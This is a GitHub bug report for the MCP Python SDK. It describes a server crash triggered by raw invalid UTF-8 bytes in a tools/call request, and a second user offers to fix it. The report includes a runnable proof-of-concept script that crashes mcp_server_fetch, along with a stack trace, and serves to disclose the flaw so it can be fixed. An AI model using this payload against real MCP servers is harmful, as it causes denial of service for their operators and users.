[Bug] Server crashes with anyio.ClosedResourceError when receiving raw invalid UTF-8 bytes

[manthanghasadiya]

Initial Checks

• I confirm that I'm using the latest version of MCP Python SDK
• I confirm that I searched for my issue in https://github.com/modelcontextprotocol/python-sdk/issues before opening this issue

Description

Summary

MCP Python SDK servers crash with anyio.ClosedResourceError when a client sends raw invalid UTF-8 bytes in request parameters. A malicious client can crash any MCP server using a single request.

Environment

• MCP SDK Version: 1.26.0 (latest)
• Python: 3.13
• OS: Windows 11

Proof of Concept

Save as crash_poc.py:

import sys
import time

# Initialize
sys.stdout.buffer.write(b'{"jsonrpc": "2.0", "id": 1, "method": "initialize", "params": {"protocolVersion": "2024-11-05", "capabilities": {}, "clientInfo": {"name": "test", "version": "1.0"}}}\n')
sys.stdout.flush()
time.sleep(1)

# Initialized notification
sys.stdout.buffer.write(b'{"jsonrpc": "2.0", "method": "notifications/initialized"}\n')
sys.stdout.flush()
time.sleep(0.5)

# Crash payload - raw bytes 0xFF 0xFE
sys.stdout.buffer.write(b'{"jsonrpc": "2.0", "id": 3, "method": "tools/call", "params": {"name": "fetch", "arguments": {"url": "http://x\xff\xfe"}}}\n')
sys.stdout.flush()
time.sleep(3)

Run:

python crash_poc.py | python -m mcp_server_fetch

Stack Trace

File "...\mcp\server\lowlevel\server.py", line 781, in _handle_request
    await message.respond(response)
File "...\mcp\shared\session.py", line 349, in _send_response
    await self._write_stream.send(session_message)
File "...\anyio\streams\memory.py", line 218, in send_nowait
    raise ClosedResourceError
anyio.ClosedResourceError

Key Observation

• String "http://x[0xff][0xfe]" → handled gracefully with validation error ✅
• Raw bytes b"http://x\xff\xfe" → server crash ❌

Expected Behavior

The server should return a JSON-RPC error response for malformed input, not crash.

Impact

Denial of Service - Any MCP client can crash any MCP server using the Python SDK with a single malformed request.

Discovery

Found using mcpsec evolutionary fuzzer.

Example Code

Python & MCP Python SDK

python --version
Python 3.13.1

pip show mcp | Select-String "Version."
Version: 1.26.0

[goingforstudying-ctrl]

I'd like to work on this issue. Could you please assign it to me? I can implement a fix to handle invalid UTF-8 bytes gracefully without crashing the server.